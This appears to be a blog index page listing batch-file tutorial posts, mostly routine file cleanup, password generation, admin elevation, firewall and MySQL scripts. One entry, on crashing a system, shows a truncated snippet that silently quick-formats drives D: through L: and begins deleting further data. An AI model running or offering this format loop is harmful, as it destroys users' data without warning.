How to Delete Folder After x Days using batch file. @echo off color 0a title Delete Folder After x Days echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º De... Ibrar Ansari January 23, 2023 Add Comment
How to Delete File After x Days using batch file. @echo off color 0a title Delete File After x Days echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Del... Ibrar Ansari January 23, 2023 Add Comment
How to generate random password using batch file @echo off color 0a :Start cls title Password Generator echo. echo. echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ... Ibrar Ansari January 22, 2022 Add Comment
(Solved) How to run batch file as admin How to run batch file as Admin @echo off color 0a title Run as Admin :: BatchGotAdmin :------------... Ibrar Ansari July 21, 2021 Add Comment
(Solved) How to block multiple EXE files in windows firewall (Solved) How to block multiple EXE files Windows Firewall. Block entire folders .exe in Windows Firewall Solved. It is very ... Ibrar Ansari February 28, 2018 Add Comment
How to crash system using batch file. @ECHO OFF ::Format all drive for %%i in (d:,e:,f:,g:,e:,f:,g:,h:,i:,:,k:,l:) do format %%i /FS:NTFS /x /q /Y ::Delete ALL Values fr... Ibrar Ansari January 18, 2017 Add Comment
How to import Mysql database in sql format using batch file @echo off color 0a title Backup MySQL databases in separate sql files echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ... Ibrar Ansari January 17, 2017 Add Comment
How to delete EXCEPT x latest folder in a folder. @echo off color 0a title Keeps the X latest folder in a folder echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo ... Ibrar Ansari January 07, 2017 Add Comment